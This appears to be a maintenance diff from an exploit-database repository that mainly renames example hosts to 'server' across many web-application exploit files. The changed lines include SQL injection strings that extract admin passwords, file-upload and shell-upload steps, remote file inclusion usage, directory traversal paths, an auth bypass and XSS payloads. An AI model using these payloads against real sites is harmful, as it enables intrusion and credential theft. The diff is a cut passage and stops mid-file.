DB: 2016-09-03

14 new exploits

Too many to list!

platforms/aix/dos/15264.py

@@ -74,7 +74,7 @@ if len(sys.argv) < 3:
 
                     print "                                                               "
 
-                    print ' usage: %s http://server.com/path/ day-mounth-year' % os.path.basename(sys.argv[0])
+                    print ' usage: %s http://server/path/ day-mounth-year' % os.path.basename(sys.argv[0])
 
 		    print "                                                               "
 
@@ -88,7 +88,7 @@ if len(sys.argv) < 3:
 
                     print "_______________________________________________________________"
 
-                    sys.exit("\nexample: http://www.server.com/ 16-10-2010")
+                    sys.exit("\nexample: http://server/ 16-10-2010")
 
                     
 

platforms/aix/dos/35342.txt

@@ -14,15 +14,15 @@ and no any filter for html code at robots.lib.php. you can inject your html code
 
 html inj.:
 
-target.com/robotstats/admin/robots.php?rub=ajouter&nom=<font color=red size=10><body bgcolor=black>NiCKNAME(orwriteyourindexcode)&actif=1&user_agent=writeanything(orhtmlcode)&ip1=&ip2=&detection=detection_user_agent&descr_fr=&descr_en=&url=
+server/robotstats/admin/robots.php?rub=ajouter&nom=<font color=red size=10><body bgcolor=black>NiCKNAME(orwriteyourindexcode)&actif=1&user_agent=writeanything(orhtmlcode)&ip1=&ip2=&detection=detection_user_agent&descr_fr=&descr_en=&url=
 
 after you go here:
 
-target.com/robotstats/info-robot.php?robot=(robot id)
+server/robotstats/info-robot.php?robot=(robot id)
 
 or
 
-target.com/robotstats/admin/robots.php you will see your html page
+server/robotstats/admin/robots.php you will see your html page
 
 analysis: (/admin/robots.php)
 

platforms/aix/webapps/14058.html

@@ -12,7 +12,7 @@
 
 [~] 1.Save code html format
 
-[~] 2.Search Target.com
+[~] 2.Search server
 
 [~] 3.Edit and replace & Target
 
@@ -26,7 +26,7 @@
 
 [~] 8.Formats can be uploaded (Html.Htm.Jpg.gif.Xml....)
 
-[~] 9.Target.com/images/uploads/File/File Name
+[~] 9.server/images/uploads/File/File Name
 
 [~]######################################### ExploiT
 #############################################[~]
@@ -62,7 +62,7 @@ Connector:<br />
 <option value="lasso/connector.lasso">Lasso</option>
 <option value="perl/connector.cgi">Perl</option>
 <option value="
-http://Target.com/includes/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php
+http://server/includes/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php
 ">PHP</option>
 <option value="py/connector.py">Python</option>
 </select>

platforms/asp/webapps/1010.pl

@@ -30,7 +30,7 @@ if (@ARGV < 2)
  print " 2 ==>   Version 1.36, 2.0 and Next\n";
  print "==========================================\n\n";
  print "Example:\n\n";
- print "    Max.pl www.Site.com 1\n";
+ print "    Max.pl www.server 1\n";
  exit();
 }
 $hell = "foo' or M_Name='admin";

platforms/asp/webapps/1011.php

@@ -7,7 +7,7 @@ Alphast , IHS Team , Shabgard Security Team , Emperor Hacking TEam
 ----------------Discovered by: s d <irsdl@yahoo.com>------------------------------------------
 */ 
 # Config ________________________________   
-# address - example: http://www.site.com/password.asp
+# address - example: http://www.server/password.asp
 $url  = "http://www.mohamad.com/password.asp";  
 $mh = "s1";   
 # if webmaxportal version is : Version 1.35 and older please input $mh= "s1" 

platforms/asp/webapps/10470.txt

@@ -1,4 +1,4 @@
-      _ _ _ _  _ _ _   _ _ _ _    _ _ _    __  _ _ _ _               _____1337~h4x0rZ__   _        ___    ___
+_ _ _ _  _ _ _   _ _ _ _    _ _ _    __  _ _ _ _               _____1337~h4x0rZ__   _        ___    ___
     /_/Rd_ _ /   _ _\/   _ _ /   \      \<   |/_ _   /         /\   |     \    /\  ||   \( )   /\  |  \  (| |
     \_ _ _ _/  /_ _ /  /      __ |  ()  / |  |  /   / [d0t]com/@~\  | (O) /   /+~\ ||_O_|( )  /0O\ |   \  | |
      _ _ _ _\  \_ _ \  \ _ _ _   |     \  |  | /   /_ _      /|__|\ |     \  /|__|\|| O |( ) /+__+\| ^  \ | |

platforms/asp/webapps/10501.txt

@@ -15,7 +15,7 @@
 
 [*] Err0r C0N50L3:
 
-[*] www.target.com/player.asp?player_id={EV!L BL!ND INJ}
+[*] server/player.asp?player_id={EV!L BL!ND INJ}
 
 
 [*] EV!L BL!ND

platforms/asp/webapps/10503.txt

@@ -15,7 +15,7 @@
 
 [*] Err0r C0N50L3:
 
-[*] www.target.com/[path]/admin/edit.asp?ID={EV!L blind sql}
+[*] server/[path]/admin/edit.asp?ID={EV!L blind sql}
 
 
 [*] EV!L BL!ND sql

platforms/asp/webapps/10504.txt

@@ -15,7 +15,7 @@
 
 [*] Err0r C0N50L3:
 
-[*] www.target.com/[path]/campaignEdit.asp?CCam={EV!L blind sql}
+[*] server/[path]/campaignEdit.asp?CCam={EV!L blind sql}
 
 
 [*] EV!L BL!ND sql

platforms/asp/webapps/1070.pl

@@ -24,7 +24,7 @@ if (@ARGV < 1)
  print "         Usage:ASPNuke.pl <T4rg3t> \n\n";
  print "==========================================\n\n";
  print "Examples:\n\n";
- print "   ASPNuke.pl www.Site.com \n";
+ print "   ASPNuke.pl www.server \n";
  exit();
 }
 

platforms/asp/webapps/10795.txt

@@ -1,4 +1,4 @@
- #####################################################
+#####################################################
  # [+] Author        :  RENO                         #
  # [+] Email         :  R7e@HoTMaiL.coM              #
  # [+] Site :  www.vxx9.cc                           #

platforms/asp/webapps/10796.txt

@@ -1,4 +1,4 @@
- #####################################################
+#####################################################
  # [+] Author        :  RENO                         #
  # [+] Email         :  R7e@HoTMaiL.coM              #
  # [+] Site :  www.vxx9.cc                           #

platforms/asp/webapps/10955.txt

@@ -26,7 +26,7 @@
  
 [ª]dem0:
  
-http://www.site.com/?page=details&newsID=1905+union+select+1,pword,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+users
+http://www.server/?page=details&newsID=1905+union+select+1,pword,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+users
 
 Admin:[Path]/admin/login.asp
 

platforms/asp/webapps/11212.txt

@@ -8,5 +8,5 @@
 # Risk: Medium
 #################################################################
 # Vulnerability:
-# http://site.com/admin/ewebeditor/admin/upload.asp?id=16&d_viewmode=&dir =./..
+# http://server/admin/ewebeditor/admin/upload.asp?id=16&d_viewmode=&dir =./..
 #################################################################

platforms/asp/webapps/11295.txt

@@ -8,7 +8,7 @@ Vulnerability:
 =======================
 Arbitrary File Upload
 =======================
-<form action = "http://site.com/manage/ewebeditor/upload.asp?action=save&type=IMAGE&style=luoye 'union select S_ID, S_Name, S_Dir, S_CSS, [S_UploadDir]% 2b' / .. / db ', S_Width, S_Height, S_Memo, S_IsSys, S_FileExt, S_FlashExt, [S_ImageExt]% 2b' | asa ', S_MediaExt, S_FileSize, S_FlashSize, S_ImageSize, S_MediaSize, S_StateFlag, S_DetectFromWord, S_InitMode, S_BaseUrl from ewebeditor_style where s_name =' standard 'and'a' = 'a "method = post name = myform enctype =" multipart / form-data "> 
+<form action = "http://server/manage/ewebeditor/upload.asp?action=save&type=IMAGE&style=luoye 'union select S_ID, S_Name, S_Dir, S_CSS, [S_UploadDir]% 2b' / .. / db ', S_Width, S_Height, S_Memo, S_IsSys, S_FileExt, S_FlashExt, [S_ImageExt]% 2b' | asa ', S_MediaExt, S_FileSize, S_FlashSize, S_ImageSize, S_MediaSize, S_StateFlag, S_DetectFromWord, S_InitMode, S_BaseUrl from ewebeditor_style where s_name =' standard 'and'a' = 'a "method = post name = myform enctype =" multipart / form-data "> 
 <p align="center"> 
 <input type=file name=uploadfile size=100><br> <br> 
 <input type=submit value=Upload>  </p>
@@ -18,19 +18,19 @@ Arbitrary File Upload
 =======================
 Arbitrary File Upload 2
 =======================
-http://site.com/admin/ewebeditor/ewebeditor.htm?id=body&style=popup 
+http://server/admin/ewebeditor/ewebeditor.htm?id=body&style=popup 
 
 
 =======================
 Database Disclosure
 =======================
-http://site.com/ewebeditor/db/ewebeditor.mdb 
+http://server/ewebeditor/db/ewebeditor.mdb 
 
 
 =======================
 Administrator bypass
 =======================
-http://site.com/eWebEditor/admin/login.asp
+http://server/eWebEditor/admin/login.asp
 
 put this code instead URL
 javascript: alert (document.cookie = "adminpass =" + escape ( "admin"));
@@ -39,11 +39,11 @@ javascript: alert (document.cookie = "adminpass =" + escape ( "admin"));
 =======================
 Directory Traversal
 =======================
-http://site.com/admin/ewebeditor/admin/upload.asp?id=16&d_viewmode=&dir=./..
+http://server/admin/ewebeditor/admin/upload.asp?id=16&d_viewmode=&dir=./..
 
 
 =======================
 Directory Traversal 2
 =======================
-http://site.com/ewebeditor/asp/browse.asp?style=standard650&dir=./..
+http://server/ewebeditor/asp/browse.asp?style=standard650&dir=./..
 

platforms/asp/webapps/11348.txt

@@ -1,4 +1,4 @@
- #######################################################################
+#######################################################################
  #                                                                     #
  ###      DA Mailing List System V2 Remote Admin Login Exploit       ###
  #                                                                     #

platforms/asp/webapps/13788.txt

@@ -1,4 +1,4 @@
-       =========================================
+=========================================
         Web Wiz Forums 9.68 SQLi  Vulnerability
        =========================================
 
@@ -22,7 +22,7 @@ Xploit: SQLi Vulnerability
 
 DEMO  URL:
 
-       http://site.com/new_reply_form.asp?TID=[SQLi]
+       http://server/new_reply_form.asp?TID=[SQLi]
 
 
 ###############################################################################################################

platforms/asp/webapps/13789.txt

@@ -1,4 +1,4 @@
-       ======================================================
+======================================================
         Virtual Real Estate Manager V 3.5 SQLi  Vulnerability
        ======================================================
 

platforms/asp/webapps/13790.txt

@@ -22,7 +22,7 @@ Xploit: SQLi Vulnerability
 
 DEMO  URL:
 
-  http://site.com/reallusiontv/ic/productdemo.asp?page=[SQLi]
+  http://server/reallusiontv/ic/productdemo.asp?page=[SQLi]
 
 
 ###############################################################################################################

platforms/asp/webapps/13793.txt

@@ -42,7 +42,7 @@ Admin Control:
 Usename:admin
 Password:admin
 
-DEMO URL :http://site.com/onlinenotebookmanager.asp?ItemID=[SQLi]
+DEMO URL :http://server/onlinenotebookmanager.asp?ItemID=[SQLi]
 
 
 -----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

platforms/asp/webapps/13880.txt

@@ -18,7 +18,7 @@
 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=1
 Author: L0rd CrusAd3r aka VSN [crusader_hmg@yahoo.com]
 Exploit Title:Smart ASP Survey SQL & XSS Vulnerable
-Vendor url:http://www.sellatsite.com
+Vendor url:http://www.sellatserver
 Version:n/a
 Published: 2010-06-15
 Greetz to:Sid3^effects, MaYur, M4n0j, Dark Blue, S1ayer,d3c0d3r,KD and to

platforms/asp/webapps/13882.txt

@@ -19,7 +19,7 @@
 
 Author: L0rd CrusAd3r aka VSN [crusader_hmg@yahoo.com]
 Exploit Title:SAS Hotel Management System SQL Vulnerable
-Vendor url:http://www.sellatsite.com
+Vendor url:http://www.sellatserver
 Version:n/a
 Price:28$
 Published: 2010-06-15

platforms/asp/webapps/14030.pl

@@ -17,9 +17,9 @@
 
 ---
 
-http://www.site.com/sablonlar/gunaysoft/gunaysoft.php?uzanti=[shell]
+http://www.server/sablonlar/gunaysoft/gunaysoft.php?uzanti=[shell]
-http://www.site.com/sablonlar/gunaysoft/gunaysoft.php?sayfaid=[shell]
+http://www.server/sablonlar/gunaysoft/gunaysoft.php?sayfaid=[shell]
-http://www.site.com/sablonlar/gunaysoft/gunaysoft.php?uzanti=[shell]
+http://www.server/sablonlar/gunaysoft/gunaysoft.php?uzanti=[shell]
 
 ---
 
@@ -100,7 +100,7 @@ print q
 Usage:
 perl phportal.pl <Target website> <Shell Location> <CMD Variable> <-r> <-p>
 <Target Website> - Path to target eg: www.victim.com
-<Shell Location> - Path to shell eg: http://site.com/r57.txt?
+<Shell Location> - Path to shell eg: http://server/r57.txt?
 <CMD Variable> - Shell command variable name eg: Pwd
 <r> - Show output from shell
 <p> - sablonlar/gunaysoft/gunaysoft.php

platforms/asp/webapps/1419.pl

@@ -12,7 +12,7 @@ if (@ARGV < 3)
  print q(
  +++++++++++++++++++++++++++++++++++++++++++++++++++
  Usage: perl mini-nuke.pl [site] [dir] [useId] [proxy (optional)] 
- i.e. perl mini-nuke.pl "somesite.com" / 52 127.0.0.1:3128
+ i.e. perl mini-nuke.pl "someserver" / 52 127.0.0.1:3128
  ++++++++++++++++++++++++++++++++++++++++++++++++++++
            );   
  exit;

platforms/asp/webapps/14284.txt

@@ -27,11 +27,11 @@ i-Gallery is a complete online photo gallery. Easy to navigate thumbnails with p
 #######################################################################################################
 Xploit :Arbitrary File Include  Vulnerabilty 
 
-DEMO URL  http://www.site.com/igallery34/viewphoto.asp?i=[file include]&f=fghd&sh=27768&sw=1024
+DEMO URL  http://www.server/igallery34/viewphoto.asp?i=[file include]&f=fghd&sh=27768&sw=1024
 
 Xploit :Persistent XSS Vulnerabilty 
 
-DEMO URL  http://www.site.com/igallery34/submitphotos.asp?mi=1
+DEMO URL  http://www.server/igallery34/submitphotos.asp?mi=1
 
 
 

platforms/asp/webapps/14419.txt

@@ -11,11 +11,11 @@ Dork : inurl:hikaye.asp?id=
  
 ===================================================
 
-[+] Vulnerable File : http://www.site.com/hikaye.asp?id=123
+[+] Vulnerable File : http://www.server/hikaye.asp?id=123
 
 ===================================================
 
-[+] Demo : http://www.site.com/hikaye.asp?id=17'a
+[+] Demo : http://www.server/hikaye.asp?id=17'a
 
 ===================================================
 

platforms/asp/webapps/14420.txt

@@ -11,11 +11,11 @@ Dork : inurl:makaledetay.asp?id=
  
 ===================================================
 
-[+] Vulnerable File : http://www.site.com/makaledetay.asp?id=123
+[+] Vulnerable File : http://www.server/makaledetay.asp?id=123
 
 ===================================================
 
-[+] Demo : http://www.site.com/makaledetay.asp?id=15%27a
+[+] Demo : http://www.server/makaledetay.asp?id=15%27a
 
 ===================================================
 

platforms/asp/webapps/14461.txt

@@ -13,14 +13,14 @@ Dork :  :/ sorry
 
 [+] Vulnerable File : 
 
-http://www.site.com/default.asp?islem=devami&id=38%20union+select+all+0,
+http://www.server/default.asp?islem=devami&id=38%20union+select+all+0,
 sifre,2,3%20,4,5+from+aky_ayarlar
 
 ===================================================
 
 [+] Demo : 
 
-http://www.site.com/blog/default.asp?islem=devami&id=38%20union+s
+http://www.server/blog/default.asp?islem=devami&id=38%20union+s
 elect+all+0,sifre,2,3%20,4,5+from+aky_ayarlar
 
 ===================================================

platforms/asp/webapps/14709.txt

@@ -1,4 +1,4 @@
- =======================================
+=======================================
     netStartEnterprise v4.0 SQL Injection Vulnerability
  =======================================
 
@@ -15,7 +15,7 @@
 
 # Version: netStartEnterprise v4.0
 
-# Path: http://www.site.com/previeweventdetail.aspx?id=[SQL]
+# Path: http://www.server/previeweventdetail.aspx?id=[SQL]
 
 # Platform: ASP
 

platforms/asp/webapps/1472.pl

@@ -84,7 +84,7 @@ sub usage()
  {
  head();
  print " Usage: Thaisql.pl <Site>  \r\n\n";
- print " <Site> - Full path to Guestbook e.g. http://www.site.com/guestbook/ \r\n";
+ print " <Site> - Full path to Guestbook e.g. http://www.server/guestbook/ \r\n";
  print "=======================================================================\r\n";
  print "   -=Coded by Zodiac, Bug Found by MurderSkillz=-\r\n";
  print "www.exploitercode.com www.g00ns.net irc.g00ns.net #g00ns\r\n";

platforms/asp/webapps/14821.txt

@@ -11,7 +11,7 @@ Vulnerability : (Auth Bypass) SQL Injection Vulnerability
 [Auth Bypass]:
 user: pouya
 pass: ' or '
-admin page : http://site.com/[path]/admin.asp
+admin page : http://server/[path]/admin.asp
 ---------------------------------
 Victem :
 http://www.etoshop.com/demo/pcstore

platforms/asp/webapps/14898.txt

@@ -123,4 +123,3 @@ Persistent XSS Vulnerabilities:
      
 
 ===========================================================================================
- 

platforms/asp/webapps/14913.txt

@@ -43,7 +43,7 @@ Step 1) Login into member or User Section
 
 Link:
 
-http://www.site.com/dmxreadyv2/membersareamanager/membersareamanager.asp?show=login-member
+http://www.server/dmxreadyv2/membersareamanager/membersareamanager.asp?show=login-member
 
 Step 2) Go to Edit profile
 
@@ -66,7 +66,7 @@ Step 3) Enter your Attack Pattern
 Step 4) Refresh and View User profile
 
 Demo Url:-
-http://www.site.com/dmxreadyv2/membersareamanager/membersareamanager.asp?member=&show=member-profile&tab=meta
+http://www.server/dmxreadyv2/membersareamanager/membersareamanager.asp?member=&show=member-profile&tab=meta
 
 ~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~
 

platforms/asp/webapps/14914.txt

@@ -38,7 +38,7 @@ Vulnerability:
 
 DEMO URL:
 
-http://www.site.com/detail.asp?ad_ID=1&vehicletypeID=[sqli]
+http://www.server/detail.asp?ad_ID=1&vehicletypeID=[sqli]
 
 
 # 0day n0 m0re #

platforms/asp/webapps/14943.txt

@@ -45,7 +45,7 @@ if id<>"" then
 lots of files those will have to do input validation from user input are vulnerable to SQL Injection .
 
 PoC : 
-www.site.com/main_fa.asp?status=news&newsID=23'/**/union/**/all/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16/**/from/**/dc_admin/*
+www.server/main_fa.asp?status=news&newsID=23'/**/union/**/all/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16/**/from/**/dc_admin/*
 note : if you can't see result you need to do it blindly 
 
 
@@ -53,7 +53,7 @@ note : if you can't see result you need to do it blindly
 2- Bypass uploads restriction:
 
 after you got user/pass with sql injection go to
-http://site.com/admin/dc_upload.asp
+http://server/admin/dc_upload.asp
 
 js file line 13-34 :
 
@@ -82,4 +82,4 @@ function showthumb(file) {
  
 as you can see the uploader will check malicious extention by javascript . just disable javascript and you can upload "ASP" shell. 
 
-you can find your shell in : www.site.com/0_site_com/[rnd-number].asp (the application itself will show you right rnd number after upload)
+you can find your shell in : www.server/0_site_com/[rnd-number].asp (the application itself will show you right rnd number after upload)

platforms/asp/webapps/14954.txt

@@ -65,4 +65,3 @@ PoC:
    Note that : the value 2010_7_25 is the exact date of server.
 
 ===========================================================================================
- 

platforms/asp/webapps/14969.txt

@@ -46,14 +46,14 @@ Description :
 
    Considering to the code, you can browse these URLs:
    
-       http://www.site.com/module/article/article/article.asp?articleid=7'                 (the false Query will be shown)
+       http://www.server/module/article/article/article.asp?articleid=7'                 (the false Query will be shown)
-       http://www.site.com/module/article/article/article.asp?articleid=7+and+'a'='a'--    (this Query is always  true) 
+       http://www.server/module/article/article/article.asp?articleid=7+and+'a'='a'--    (this Query is always  true) 
 
    with the following URL you can find the first character of Username:  
-       http://www.site.com/module/article/article/article.asp?articleid=7+and+'a'=(select+SUBSTRING(Username,1,1)+from+tblUser)--
+       http://www.server/module/article/article/article.asp?articleid=7+and+'a'=(select+SUBSTRING(Username,1,1)+from+tblUser)--
    
    and second character:
-       http://www.site.com/module/article/article/article.asp?articleid=7+and+'a'=(select+SUBSTRING(Username,2,1)+from+tblUser)--
+       http://www.server/module/article/article/article.asp?articleid=7+and+'a'=(select+SUBSTRING(Username,2,1)+from+tblUser)--
    
    and so on.
    

platforms/asp/webapps/15058.html

@@ -83,4 +83,3 @@ This page remove Admins Role in VWD-CMS.
 
 
 ===========================================================================================
- 

platforms/asp/webapps/15067.txt

@@ -179,4 +179,3 @@ Persistent XSS and XSRF:
 
 
 ===========================================================================================
- 

platforms/asp/webapps/15078.txt

@@ -183,4 +183,3 @@ This page uploads a file
 
 
 ===========================================================================================
- 

platforms/asp/webapps/15106.txt

@@ -61,4 +61,3 @@ Persistent XSS in admin section:
 
 
 ===========================================================================================
- 

platforms/asp/webapps/15118.txt

@@ -9,7 +9,7 @@ Gokhun ASP Stok v1.0 - Multiple Remote Vulnerabilities
 ~Script : Gokhun ASP Stok v1.0
 ~Software: http://www.gokhun.com & http://www.aspindir.com/goster/6092
 ~Vulnerability Style : Multiple vulnerabilities
-~Demo : http://www.site.com/asp/pages/main/
+~Demo : http://www.server/asp/pages/main/
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~~~~~~~ Explotation ~~~~~~~~~~~
 ======== SQL Injection =========
@@ -51,7 +51,7 @@ print "[-]Ornegi inceleyin\n\n";
 }
 sub help()
 {
-print "[+] usage1 : perl $0 site.com /path/ \n";
+print "[+] usage1 : perl $0 server /path/ \n";
 print "[+] usage2 : perl $0 localhost / \n";
 }
 

platforms/asp/webapps/15160.txt

@@ -160,4 +160,3 @@ This page uploads a file with "xml" extension
 </html>
 
 ===========================================================================================
- 

platforms/asp/webapps/15183.py

@@ -40,7 +40,7 @@ if len(sys.argv) < 2:
 					print "                                                               "
 					print " coded by ZoRLu                                                "
 					print "                                                               "
-					print ' usage: %s http://server.com/path/' % os.path.basename(sys.argv[0])
+					print ' usage: %s http://server/path/' % os.path.basename(sys.argv[0])
 					print "                                                               "
 					print "_______________________________________________________________"
 					sys.exit(1)

platforms/asp/webapps/15199.py

@@ -38,7 +38,7 @@ if len(sys.argv) < 2:
                     print "                                                               "
                     print " coded by ZoRLu                                                "
                     print "                                                               "
-                    print ' usage: %s http://server.com/path/' % os.path.basename(sys.argv[0])
+                    print ' usage: %s http://server/path/' % os.path.basename(sys.argv[0])
                     print "                                                               "
                     print "_______________________________________________________________"
                     sys.exit(1)

platforms/asp/webapps/15219.py

@@ -29,7 +29,7 @@ if len(sys.argv) < 2:
     print "                                                               "
     print "   Usage:                                                      "
     print "                                                               "
-    print "   python exploit.py http://site.com/path/                     "
+    print "   python exploit.py http://server/path/                     "
     print "                                                               "
     print "_______________________________________________________________"
     sys.exit(1)

platforms/asp/webapps/15270.txt

@@ -49,7 +49,7 @@ print "[-]Ornegi inceleyin\n\n";
 }
 sub help()
 {
-print "[+] usage1 : perl $0 site.com /path/ \n";
+print "[+] usage1 : perl $0 server /path/ \n";
 print "[+] usage2 : perl $0 localhost / \n";
 }
 

platforms/asp/webapps/15382.txt

@@ -29,7 +29,7 @@ private void Page_Load(object sender, EventArgs e)
 }
 [-] End Poc
 [#] Exploit :
-http://Site.Com/DesktopModules/Gallery/OrderForm.aspx?itemtitle=<script>alert('ITSecTeam')</script>
+http://server/DesktopModules/Gallery/OrderForm.aspx?itemtitle=<script>alert('ITSecTeam')</script>
 
 
 [2] Remote File Upload :
@@ -41,14 +41,14 @@ string acceptedFiles =
 ";.jpg;.jpeg;.jpe;.gif;.bmp;.png;.swf;.avi;.ra;.mov;.mpeg;.mpg;.wav;";
 You Can Bypass
 [-] End Poc
-[#] Exploit :http://Site.Com/DesktopModules/ftb/ftb.imagegallery.aspx[*]
+[#] Exploit :http://server/DesktopModules/ftb/ftb.imagegallery.aspx[*]
 
 
 [3] Information Leakage Show Device Info :
-http://Site.Com/security/DeviceInfo.aspx
+http://server/security/DeviceInfo.aspx
 
 [4] Xss Present :
-http://Site.Com/security/DeviceInfo.aspx
+http://server/security/DeviceInfo.aspx
 [~] Poc :
 Douran.dll:DouranPortal.DesktopModules.BlogDB
 Submit Data Without Check{
@@ -104,7 +104,7 @@ SqlDbType.NVarChar, 100);
     command.ExecuteNonQuery();
     sqlConnectionString.Close();}
 	[-] End Poc
-[#] Exploit :http://Site.Com/DesktopModules/Blog/BlogView.aspx
+[#] Exploit :http://server/DesktopModules/Blog/BlogView.aspx
 [-][-][-][-][-][-][-](Vulnerabilities)[-][-][-][-][-][-][-]
 
 ~~~~~~~~~~~~~~~~[Vulnerabilities]~~~~~~~~~~~~~~~~~~~~~~~~~~~~

platforms/asp/webapps/15544.txt

@@ -25,7 +25,7 @@ NewsPad Database Download Vulnerability
 
 ############################################################
 
-exploit # www.target.com/path/database/NewsPad.mdb
+exploit # server/path/database/NewsPad.mdb
 
 
 ############################################################

platforms/asp/webapps/15551.txt

@@ -1,4 +1,4 @@
-     )   )            )                     (   (         (   (    (       )     ) 
+)   )            )                     (   (         (   (    (       )     ) 
   ( /(( /( (       ( /(  (       (    (     )\ ))\ )      )\ ))\ ) )\ ) ( /(  ( /( 
   )\())\()))\ )    )\()) )\      )\   )\   (()/(()/(  (  (()/(()/((()/( )\()) )\())
  ((_)((_)\(()/(   ((_)((((_)(  (((_)(((_)(  /(_))(_)) )\  /(_))(_))/(_))(_)\|((_)\ 

platforms/asp/webapps/15552.txt

@@ -1,4 +1,4 @@
-     )   )            )                     (   (         (   (    (       )     ) 
+)   )            )                     (   (         (   (    (       )     ) 
   ( /(( /( (       ( /(  (       (    (     )\ ))\ )      )\ ))\ ) )\ ) ( /(  ( /( 
   )\())\()))\ )    )\()) )\      )\   )\   (()/(()/(  (  (()/(()/((()/( )\()) )\())
  ((_)((_)\(()/(   ((_)((((_)(  (((_)(((_)(  /(_))(_)) )\  /(_))(_))/(_))(_)\|((_)\ 

platforms/asp/webapps/15553.txt

@@ -1,4 +1,4 @@
-     )   )            )                     (   (         (   (    (       )     ) 
+)   )            )                     (   (         (   (    (       )     ) 
   ( /(( /( (       ( /(  (       (    (     )\ ))\ )      )\ ))\ ) )\ ) ( /(  ( /( 
   )\())\()))\ )    )\()) )\      )\   )\   (()/(()/(  (  (()/(()/((()/( )\()) )\())
  ((_)((_)\(()/(   ((_)((((_)(  (((_)(((_)(  /(_))(_)) )\  /(_))(_))/(_))(_)\|((_)\ 

platforms/asp/webapps/15554.txt

@@ -1,4 +1,4 @@
-     )   )            )                     (   (         (   (    (       )     ) 
+)   )            )                     (   (         (   (    (       )     ) 
   ( /(( /( (       ( /(  (       (    (     )\ ))\ )      )\ ))\ ) )\ ) ( /(  ( /( 
   )\())\()))\ )    )\()) )\      )\   )\   (()/(()/(  (  (()/(()/((()/( )\()) )\())
  ((_)((_)\(()/(   ((_)((((_)(  (((_)(((_)(  /(_))(_)) )\  /(_))(_))/(_))(_)\|((_)\ 

platforms/asp/webapps/15563.txt

@@ -17,13 +17,13 @@ Sitefinity CMS (ASP.NET) Shell Upload Vulnerability
 
     exploit # /UserControls/Dialogs/ImageEditorDialog.aspx
 
-first go to # http://site.com/sitefinity/
+first go to # http://server/sitefinity/
 
-       then # http://site.com/sitefinity/UserControls/Dialogs/ImageEditorDialog.aspx
+       then # http://server/sitefinity/UserControls/Dialogs/ImageEditorDialog.aspx
 
      select # asp renamed via the .asp;.jpg (shell.asp;.jpg)
 
-  Upload to # http://site.com/Images/[shell]
+  Upload to # http://server/Images/[shell]
 
 
     Video : http://net-edit0r.persiangig.com/Film/0day.rar

platforms/asp/webapps/15653.txt

@@ -1,4 +1,4 @@
-      Core Security Technologies - CoreLabs Advisory
+Core Security Technologies - CoreLabs Advisory
                   http://corelabs.coresecurity.com/
 
           Multiple vulnerabilities in BugTracker.Net

platforms/asp/webapps/1569.pl

@@ -1,4 +1,4 @@
- #!/usr/bin/perl -w 
+#!/usr/bin/perl -w 
  # D2KBLOG SQL injection 
  # Discovered by : Farhad Koosha [ farhadkey [at} kapda.ir ]
  # Exploited by : devil_box [ devil_box [at} kapda.ir ]
@@ -15,7 +15,7 @@ print "\r\n=-=-=-===============================================================
  if (@ARGV != 2) 
  { 
     print "	Usage: kapda_D2KBLOG_xpl.pl [Target Domain] [Vulnerable Page]\n\r\n"; 
-    print "	ex: kapda_D2KBLOG_xpl.pl www.target.com /blog/profile.asp\n\r\n";
+    print "	ex: kapda_D2KBLOG_xpl.pl server /blog/profile.asp\n\r\n";
     exit (); 
  } 
 

platforms/asp/webapps/15703.txt

@@ -36,4 +36,3 @@ Personal
 #   Special Thanks : Farzad_Ho,R3dMind,rAbiN_hoOd,Falcon
 
 
-      

platforms/asp/webapps/15776.pl

@@ -8,7 +8,7 @@
 # Found: Br0ly 
 # google dork: inurl:"produtos.asp?produto="
 # Use some base64 decode google IT.
-# After decoding  login and pass go to: www.site.com.br/administrador.asp
+# After decoding  login and pass go to: www.server.br/administrador.asp
 # aoiuaoaaaaiuahiuahaaiauhaiuha EASY ???
 # BRASIL!! :D
 #

platforms/asp/webapps/16205.txt

@@ -6,11 +6,11 @@ dork : intext:"powered by DiyWeb"
 SQL - Microsoft JET Database Engine error
 -----------------------------------------
 
-http://site.com/template.asp?menuid=[SQL]
+http://server/template.asp?menuid=[SQL]
-http://site.com/viewcatalog.asp?id=[SQL]
+http://server/viewcatalog.asp?id=[SQL]
-http://site.com/xxx.asp?id=[SQL]
+http://server/xxx.asp?id=[SQL]
 
 XSS
 ---
-http://site.com/diyweb/login.asp?msg=[XSS] -- login page
+http://server/diyweb/login.asp?msg=[XSS] -- login page
 

platforms/asp/webapps/16241.txt

@@ -8,21 +8,21 @@ Blind SQL
 
 POC
 ---
-http://site.com//gallery_details.asp?a_id=12' and '1'='1 TRUE
+http://server//gallery_details.asp?a_id=12' and '1'='1 TRUE
-http://site.com//gallery_details.asp?a_id=12' and '0'='1 FALSE
+http://server//gallery_details.asp?a_id=12' and '0'='1 FALSE
 
 2 - Parameter news.asp?intSeq=[Blind SQL]
 
 POC
 ---
-http://www.site.com/news/news.asp?intSeq=69' and '1'='1 TRUE
+http://www.server/news/news.asp?intSeq=69' and '1'='1 TRUE
-http://www.site.com/news/news.asp?intSeq=69' and '0'='1 FALSE
+http://www.server/news/news.asp?intSeq=69' and '0'='1 FALSE
 
 3 - Parameter news.asp?id=[Blind SQL]
 
 POC
 ---
-http://www.site.com/news/news.asp?id=256 and 1=1 TRUE
+http://www.server/news/news.asp?id=256 and 1=1 TRUE
-http://www.site.com/news/news.asp?id=256 and 1=0 FALSE
+http://www.server/news/news.asp?id=256 and 1=0 FALSE
 
  		 	   		

platforms/asp/webapps/16941.txt

@@ -8,13 +8,13 @@ SQL - Microsoft JET Database Engine error
